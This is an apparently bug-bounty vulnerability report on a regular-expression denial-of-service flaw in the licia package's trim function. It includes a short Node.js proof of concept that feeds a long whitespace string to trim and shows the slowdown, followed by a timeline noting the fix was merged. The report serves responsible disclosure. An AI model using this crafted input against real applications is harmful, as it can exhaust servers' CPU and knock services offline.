Inefficient Regular Expression Complexity in liriliri/licia

Valid

Reported on

Jul 18th 2021


✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the licia package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

Similar to https://nvd.nist.gov/vuln/detail/CVE-2020-28500

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// PoC.js
var l = require('licia');

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var s = build_blank(50000)
var time = Date.now();
l.trim(s)
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Execute the following in terminal:

npm i licia
node poc.js

Check the Output:

time_cost: 2269

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. 📍 Location trim.js#L26

We have contacted a member of the liriliri/licia team and are waiting to hear back 4 months ago
ready-research modified their report
3 months ago
RedHoodSu confirmed that a fix has been merged on 10006a 2 months ago
RedHoodSu has been awarded the fix bounty